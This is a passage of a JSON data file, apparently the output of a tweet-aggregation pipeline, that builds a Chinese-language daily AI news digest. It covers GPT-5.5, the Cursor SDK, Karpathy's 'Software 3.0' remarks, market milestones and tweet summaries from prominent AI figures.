"模型能力", + "count": 113 + }, + { + "title": "算力与芯片", + "count": 23 + }, + { + "title": "交易与市场", + "count": 16 + }, + { + "title": "投融资与并购", + "count": 5 + } + ], + "modules": { + "headline": "GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "themes": [ + { + "id": "t1", + "title": "Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日", + "subtitle": "Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线", + "priority": "P0", + "bullets": [ + "Sam Altman:希望OpenAI做\"forever low margin\"公司,类比水电煤公用事业", + "Switching costs正在崩塌,Altman认为AI真正价值是\"省掉不该做的事\"而非\"把某件事做得更好\"", + "GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出" + ], + "samples": [ + { + "text": "use codex or claude code, whatever works best for you", + "url": "https://x.com/sama/status/2050274547061129577", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Switching costs are collapsing in AI.", + "url": "https://x.com/sama/status/2049653810558353746", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "handle": "Pluvio9yte", + "date": "2026-05-01" + } + ] + }, + { + "id": "t2", + "title": "Cursor SDK正式开放:可构建自定义背景Agent", + "subtitle": "Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent", + "priority": "P0", + "bullets": [ + "Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent", + "开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board", + "Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent" + ], + "samples": [ + { + "text": "Announcing Cursor SDK: Build agents with the same runtime, harness, and models as Cursor.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "handle": "cursor_ai", + "date": "2026-05-01" + }, + { + "text": "Cursor Security Review for Teams and Enterprise is now available.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "handle": "cursor_ai", + "date": "2026-05-01" + } + ] + }, + { + "id": "t3", + "title": "Karpathy:AI编程拐点已至,Software 3.0时代来临", + "subtitle": "在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进", + "priority": "P0", + "bullets": [ + "2025-12是拐点:生成代码块变大变连贯,编程最小单位从\"写代码\"升级到\"委派任务\"", + "神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件" + ], + "samples": [ + { + "text": "Karpathy:2025-12是AI编程拐点,Software 3.0时代来临", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "text": "神经网络会成主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "handle": "runes_leo", + "date": "2026-05-01" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "Claude Code大更新:/resume提速67%,MCP支持并发连接", + "meta": "runes_leo", + "summary": "Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个", + "url": "https://x.com//status/2050229609795407876", + "handle": "runes_leo", + "date": "2026-05-01" + }, + { + "id": "p02", + "title": "纳斯达克首次突破25000点", + "meta": "charliebilello", + "summary": "纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800", + "url": "https://x.com//status/2050210847650132146", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p03", + "title": "NVIDIA过去10年涨幅22875%,比特币17205%", + "meta": "charliebilello", + "summary": "过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%", + "url": "https://x.com//status/2050263578188333549", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p04", + "title": "美国汽油价格创30年最大涨幅", + "meta": "charliebilello", + "summary": "美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大", + "url": "https://x.com//status/2050196201014718675", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p05", + "title": "Anthropic发布BioMysteryBench:Claude在生物信息学领域突破", + "meta": "Pluvio9yte", + "summary": "BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%", + "url": "https://x.com//status/2050063821377810451", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "id": "p06", + "title": "OpenAI Codex升级:非编程计算机工作提速42%", + "meta": "sama", + "summary": "Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作", + "url": "https://x.com//status/2049946120441520624", + "handle": "sama", + "date": "2026-05-01" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "speaker": "Paul Graham", + "date": "2026-05-01", + "note": "Sam Altman转发", + "url": "https://x.com/Paul Graham/status/2050233324963008553", + "handle": "paulg" + }, + { + "id": "q2", + "quote": "we want to build tools to augment and elevate people, not entities to replace them.", + "speaker": "Sam Altman", + "date": "2026-05-01", + "note": "Altman回应AI导致失业担忧", + "url": "https://x.com/Sam Altman/status/2050229058425045178", + "handle": "sama" + }, + { + "id": "q3", + "quote": "All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned.", + "speaker": "Yann LeCun", + "date": "2026-05-01", + "note": "LeCun再次力挺开源,炮轰AI限制派", + "url": "https://x.com/Yann LeCun/status/2050162348891979817", + "handle": "ylecun" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具", + "subtitle": "Cursor SDK开放构建自定义Agent", + "level": "P0", + "items": [] + }, + { + "id": "c2", + "title": "模型与产品", + "subtitle": "GPT-5.5发布会定档", + "level": "P0", + "items": [ + { + "text": "GPT-5.5-Cyber网络安全模型即将推出", + "url": "https://x.com//status/2049712078836170843" + } + ] + }, + { + "id": "c3", + "title": "投资与宏观", + "subtitle": "纳斯达克里程碑+能源价格飙升", + "level": "P1", + "items": [] + }, + { + "id": "c4", + "title": "AI研究突破", + "subtitle": "Karpathy Software 3.0 + Anthropic生物Bench", + "level": "P1", + "items": [] + }, + { + "id": "c5", + "title": "开源与生态", + "subtitle": "LeCun再杠开源限制", + "level": "P2", + "items": [ + { + "text": "匿名实验:Claude Code对含特定关键词的仓库报错\"out of extra usage\"", + "url": "https://x.com//status/2050127414630469937" + } + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "中文博主实操分享", + "level": "P2", + "items": [ + { + "text": "铁锤人:Apple Support App用Claude Code打包", + "url": "https://x.com//status/2050240636020732015" + }, + { + "text": "0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度", + "url": "https://x.com//status/2050244250563182801" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "Gary Marcus:AI对齐尚未解决,大规模部署风险极高", + "detail": "Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险", + "url": "https://x.com/GaryMarcus/status/2050296366161940584" + }, + { + "id": "r2", + "level": "MID", + "title": "Gary Marcus:AI对GDP的贡献类似\"挖坑填坑\"", + "detail": "引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值", + "url": "https://x.com/GaryMarcus/status/2050284439343862266" + }, + { + "id": "r3", + "level": "OPP", + "title": "用户隐私争议再起", + "detail": "Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧", + "url": "https://x.com/GaryMarcus/status/2050275183223857462" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-05-01T19:38:36.469180+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 44 | **成功获取**: 34 | **推文总数**: 478\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(3 条)\n\n**[2026-04-30T17:43:06+00:00]**\n> This is the the quote I've been citing a lot recently.\n[原文链接](https://x.com/karpathy/status/2049907410303865030)\n\n**[2026-04-30T17:28:50+00:00]**\n> Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights: The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). T…\n[原文链接](https://x.com/karpathy/status/2049903821095354523)\n\n**[2026-04-27T21:34:34+00:00]**\n> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh…\n[原文链接](https://x.com/karpathy/status/2048878495539843211)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-05-01T18:01:58+00:00]**\n> you know what all of these \"which is better\" polls are silly use codex or claude code, whatever works best for you i am grateful we live in a time with such amazing tools, and grateful there is a cho…\n[原文链接](https://x.com/sama/status/2050274547061129577)\n\n**[2026-05-01T15:18:10+00:00]**\n> RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great…\n[原文链接](https://x.com/sama/status/2050233324963008553)\n\n**[2026-05-01T15:01:14+00:00]**\n> R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amaz…\n[原文链接](https://x.com/sama/status/2050229060887044494)\n\n**[2026-05-01T15:01:13+00:00]**\n> R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong. though of course there will be disruption/significan…\n[原文链接](https://x.com/sama/status/2050229059507159242)\n\n**[2026-05-01T15:01:13+00:00]**\n> we want to build tools to augment and elevate people, not entities to replace them.\n[原文链接](https://x.com/sama/status/2050229058425045178)\n\n**[2026-05-01T01:17:03+00:00]**\n> artificial goblin intelligence achieved\n[原文链接](https://x.com/sama/status/2050021650641695108)\n\n**[2026-04-30T20:16:55+00:00]**\n> big upgrade for codex today! try it for non-coding computer work.\n[原文链接](https://x.com/sama/status/2049946120441520624)\n\n**[2026-04-30T20:12:24+00:00]**\n> it does seem cool\n[原文链接](https://x.com/sama/status/2049944981750833659)\n\n**[2026-04-30T19:23:47+00:00]**\n> RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.\n[原文链接](https://x.com/sama/status/2049932746567598472)\n\n**[2026-04-30T19:08:00+00:00]**\n> RT by @sama: It's never been easier to do everyday work with Codex. Choose your role, connect the apps you use every day, and try suggested prompts. Codex helps with everything from research and plan…\n[原文链接](https://x.com/sama/status/2049928776147230886)\n\n**[2026-04-30T17:29:15+00:00]**\n> lisan say more mean things about us you're being too nice\n[原文链接](https://x.com/sama/status/2049903925311267311)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a wi…\n[原文链接](https://x.com/sama/status/2049729530059960571)\n\n**[2026-04-30T04:59:15+00:00]**\n> alignment failure\n[原文链接](https://x.com/sama/status/2049715178611380317)\n\n**[2026-04-30T04:46:56+00:00]**\n> we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days. we will work with the entire ecosystem and the government to figure out trus…\n[原文链接](https://x.com/sama/status/2049712078836170843)\n\n**[2026-04-30T03:27:12+00:00]**\n> R to @sama: openai.com/index/where-the-g…\n[原文链接](https://x.com/sama/status/2049692014586048973)\n\n**[2026-04-30T03:27:08+00:00]**\n> goblinblog dropped\n[原文链接](https://x.com/sama/status/2049691999444639872)\n\n**[2026-04-30T03:18:22+00:00]**\n> RT by @sama: This GPT Image 2 prompt is going insanely viral right now. “Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it…\n[原文链接](https://x.com/sama/status/2049689793118998717)\n\n**[2026-04-30T00:55:24+00:00]**\n> R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local. we'll close the link tomorrow at 5:55 pm.\n[原文链接](https://x.com/sama/status/2049653814463168638)\n\n**[2026-04-30T00:55:23+00:00]**\n> GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. if you'd like to come, let us know here: https://luma.com/5.5 codex will help the team pick people from the…\n[原文链接](https://x.com/sama/status/2049653810558353746)\n\n**[2026-04-29T14:19:33+00:00]**\n> R to @sama: i meant a goblin moment, sorry\n[原文链接](https://x.com/sama/status/2049493797114126484)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(7 条)\n\n**[2026-05-01T03:22:08+00:00]**\n> Computer plays the orchestra\n[原文链接](https://x.com/AravSrinivas/status/2050053128452456584)\n\n**[2026-05-01T03:04:54+00:00]**\n> Video\n[原文链接](https://x.com/AravSrinivas/status/2050048790908785072)\n\n**[2026-04-30T17:42:35+00:00]**\n> RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer. This workflow pulls …\n[原文链接](https://x.com/AravSrinivas/status/2049907277646160333)\n\n**[2026-04-28T16:05:11+00:00]**\n> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al…\n[原文链接](https://x.com/AravSrinivas/status/2049157990604025896)\n\n**[2026-04-28T15:38:49+00:00]**\n> R to @AravSrinivas: reddit.com/r/GeminiAI/commen…\n[原文链接](https://x.com/AravSrinivas/status/2049151356985040934)\n\n**[2026-04-28T15:38:28+00:00]**\n> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.\n[原文链接](https://x.com/AravSrinivas/status/2049151268606894310)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(2 条)\n\n**[2026-04-30T16:21:35+00:00]**\n> Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out. I'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current s…\n[原文链接](https://x.com/AndrewYNg/status/2049886895530967534)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @cursor_ai — Cursor(12 条)\n\n**[2026-04-30T18:58:07+00:00]**\n> R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience. Security agents draw from your existing usage poo…\n[原文链接](https://x.com/cursor_ai/status/2049926287439929475)\n\n**[2026-04-30T18:58:06+00:00]**\n> R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements. Adjust triggers, add your own instructions, give them custom tooling, and choose how outputs are sha…\n[原文链接](https://x.com/cursor_ai/status/2049926285518848093)\n\n**[2026-04-30T18:58:06+00:00]**\n> Cursor Security Review is now available for Teams and Enterprise plans. Run two types of always-on agents: 1. Security Reviewer checks every PR for vulnerabilities and leaves comments. 2. Vulnerabili…\n[原文链接](https://x.com/cursor_ai/status/2049926283061035254)\n\n**[2026-04-30T17:19:22+00:00]**\n> Our agent harness makes models inside Cursor faster, smarter, and more token-efficient. Here's how we test improvements to the harness, monitor and repair degradations, and customize it for different…\n[原文链接](https://x.com/cursor_ai/status/2049901436918436249)\n\n**[2026-04-29T14:43:43+00:00]**\n> R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codeb…\n[原文链接](https://x.com/cursor_ai/status/2049499876388454903)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board. Use Cursor to customize them for your use ca…\n[原文链接](https://x.com/cursor_ai/status/2049499874043830389)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.\n[原文链接](https://x.com/cursor_ai/status/2049499871980200082)\n\n**[2026-04-29T14:43:40+00:00]**\n> We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to-end workflows, or…\n[原文链接](https://x.com/cursor_ai/status/2049499866217185492)\n\n**[2026-04-24T19:48:34+00:00]**\n> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download\n[原文链接](https://x.com/cursor_ai/status/2047764656165646786)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders.\n[原文链接](https://x.com/cursor_ai/status/2047764654760632725)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha…\n[原文链接](https://x.com/cursor_ai/status/2047764652977958938)\n\n**[2026-04-24T19:48:33+00:00]**\n> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur…\n[原文链接](https://x.com/cursor_ai/status/2047764651363180839)\n\n---\n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-05-01T10:36:08+00:00]**\n> RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. It's really as simple as that. They want to take away your …\n[原文链接](https://x.com/ylecun/status/2050162348891979817)\n\n**[2026-05-01T00:42:44+00:00]**\n> RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing busi…\n[原文链接](https://x.com/ylecun/status/2050013015680995631)\n\n**[2026-04-30T11:02:45+00:00]**\n> RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱: ▶️demo: https://aidemos.atmeta.com/tribev2/ 📄paper: htt…\n[原文链接](https://x.com/ylecun/status/2049806660001022372)\n\n**[2026-04-30T06:58:24+00:00]**\n> RT by @ylecun: These folks are trying to ban open source. They're looking to take away your freedom to choose. They're also looking to take away the rights of businesses like Cursor to fine tune and …\n[原文链接](https://x.com/ylecun/status/2049745165665853742)\n\n**[2026-04-30T00:05:29+00:00]**\n> Trump's war on science.\n[原文链接](https://x.com/ylecun/status/2049641252287607241)\n\n**[2026-04-29T22:48:11+00:00]**\n> RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration: “I’d be surprised if we don’t g…\n[原文链接](https://x.com/ylecun/status/2049621796736180438)\n\n**[2026-04-29T20:43:08+00:00]**\n> RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board s…\n[原文链接](https://x.com/ylecun/status/2049590329871904801)\n\n**[2026-04-29T18:50:10+00:00]**\n> RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR\n[原文链接](https://x.com/ylecun/status/2049561899189055901)\n\n**[2026-04-29T11:49:39+00:00]**\n> RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is …\n[原文链接](https://x.com/ylecun/status/2049456071278747804)\n\n**[2026-04-29T00:50:33+00:00]**\n> RT by @ylecun: - Comey indicted for tweeting a number. - Trump FCC threatens ABC's broadcast license. - Trump defacing more govt institutions with his name and picture. - Trump's kids cashing in on h…\n[原文链接](https://x.com/ylecun/status/2049290206923382906)\n\n**[2026-04-28T23:38:23+00:00]**\n> RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on…\n[原文链接](https://x.com/ylecun/status/2049272044504936685)\n\n**[2026-04-28T21:36:28+00:00]**\n> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github…\n[原文链接](https://x.com/ylecun/status/2049241361266684288)\n\n**[2026-04-28T01:05:42+00:00]**\n> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be…\n[原文链接](https://x.com/ylecun/status/2048931628995510596)\n\n**[2026-04-27T21:38:46+00:00]**\n> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists\n[原文链接](https://x.com/ylecun/status/2048879552022130882)\n\n**[2026-04-27T21:06:29+00:00]**\n> RT by @ylecun: He is right\n[原文链接](https://x.com/ylecun/status/2048871429681148028)\n\n**[2026-04-27T14:59:33+00:00]**\n> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye…\n[原文链接](https://x.com/ylecun/status/2048779086168838610)\n\n**[2026-04-27T12:27:04+00:00]**\n> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne…\n[原文链接](https://x.com/ylecun/status/2048740712556933170)\n\n**[2026-04-26T23:40:02+00:00]**\n> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au…\n[原文链接](https://x.com/ylecun/status/2048547683112046771)\n\n**[2026-04-26T19:19:22+00:00]**\n> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is…\n[原文链接](https://x.com/ylecun/status/2048482084646240560)\n\n**[2026-04-26T16:08:11+00:00]**\n> RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? Hell no, right? But the answer is actuall…\n[原文链接](https://x.com/ylecun/status/2048433973177573559)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(4 条)\n\n**[2026-04-29T16:00:49+00:00]**\n> RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download. Available globally f…\n[原文链接](https://x.com/JeffDean/status/2049519281600373159)\n\n**[2026-04-28T20:16:21+00:00]**\n> Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below. Translate is one of my favorite Google products because it brings us all closer together! I've been involved wi…\n[原文链接](https://x.com/JeffDean/status/2049221200321380805)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-29T13:07:26+00:00]**\n> Github and critical work are becoming incompatible\n[原文链接](https://x.com/soumithchintala/status/2049475649157374146)\n\n**[2026-04-28T13:25:24+00:00]**\n> Test of Time LLM from some legends...pretty fun!\n[原文链接](https://x.com/soumithchintala/status/2049117783447785523)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(16 条)\n\n**[2026-05-01T19:28:41+00:00]**\n> If you think you are going to get alignment out of LLMs you are sadly mistaken. If you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment …\n[原文链接](https://x.com/GaryMarcus/status/2050296366161940584)\n\n**[2026-05-01T18:41:17+00:00]**\n> AI and GDP - what does it mean? Sure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured…\n[原文链接](https://x.com/GaryMarcus/status/2050284439343862266)\n\n**[2026-05-01T18:22:55+00:00]**\n> One of the things I hate the most about this site is the consistent lack of nuance. That’s why everything is an argument, and progress here is so rare.\n[原文链接](https://x.com/GaryMarcus/status/2050279819347448258)\n\n**[2026-05-01T18:21:24+00:00]**\n> I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead. Maybe “clown” isn’t the right word here.\n[原文链接](https://x.com/GaryMarcus/status/2050279436717785406)\n\n**[2026-05-01T18:04:30+00:00]**\n> Meta is basically Black Mirror incarnate.\n[原文链接](https://x.com/GaryMarcus/status/2050275183223857462)\n\n**[2026-05-01T18:04:01+00:00]**\n> “Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, m…\n[原文链接](https://x.com/GaryMarcus/status/2050275059361792137)\n\n**[2026-05-01T17:30:46+00:00]**\n> Elon Musk, Sam Altman, the future of humanity, and … goblins. Terrific interview @theinformation with @rocketalignment https://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl\n[原文链接](https://x.com/GaryMarcus/status/2050266692732014689)\n\n**[2026-05-01T13:34:42+00:00]**\n> First Silicon Valley captured the US Government, and now it is capturing “independent” media.\n[原文链接](https://x.com/GaryMarcus/status/2050207285377417591)\n\n**[2026-05-01T03:44:13+00:00]**\n> Customer service in the age of AI has been become truly horrible. Excruciatingly bad.\n[原文链接](https://x.com/GaryMarcus/status/2050058685531983988)\n\n**[2026-05-01T03:37:32+00:00]**\n> Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t l…\n[原文链接](https://x.com/GaryMarcus/status/2050057004862103767)\n\n**[2026-05-01T03:12:06+00:00]**\n> RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.\n[原文链接](https://x.com/GaryMarcus/status/2050050604915888484)\n\n**[2026-05-01T01:13:13+00:00]**\n> I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?\n[原文链接](https://x.com/GaryMarcus/status/2050020685733564459)\n\n**[2026-05-01T01:11:09+00:00]**\n> Most evil person in AI\n[原文链接](https://x.com/GaryMarcus/status/2050020164612104604)\n\n**[2026-05-01T01:09:21+00:00]**\n> Once again IP thieves accusing other IP thieves of IP thievery! The nerve!\n[原文链接](https://x.com/GaryMarcus/status/2050019713409814672)\n\n**[2026-05-01T00:27:22+00:00]**\n> Tokenmaxxing is stupid. Change my mind?\n[原文链接](https://x.com/GaryMarcus/status/2050009144846119068)\n\n**[2026-04-30T17:49:50+00:00]**\n> RT by @GaryMarcus: John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻 The tides are changing, and other folks like @wendyweeww are speaking out in support.\n[原文链接](https://x.com/GaryMarcus/status/2049909103129251864)\n\n---\n\n### ⚠️ @elonmusk — Elon Musk(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-05-01T15:24:04+00:00]**\n> R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are…\n[原文链接](https://x.com/paulg/status/2050234809188761677)\n\n**[2026-05-01T15:18:10+00:00]**\n> Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a m…\n[原文链接](https://x.com/paulg/status/2050233324963008553)\n\n**[2026-05-01T14:42:53+00:00]**\n> RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks. In this episode of Decoded, YC's @agupta and…\n[原文链接](https://x.com/paulg/status/2050224443461718118)\n\n**[2026-05-01T14:15:19+00:00]**\n> This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.\n[原文链接](https://x.com/paulg/status/2050217507374457280)\n\n**[2026-05-01T12:40:47+00:00]**\n> RT by @paulg: This is remarkable and you should watch this entire video. The House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, a…\n[原文链接](https://x.com/paulg/status/2050193715063300532)\n\n**[2026-05-01T11:19:10+00:00]**\n> RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away. It is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t 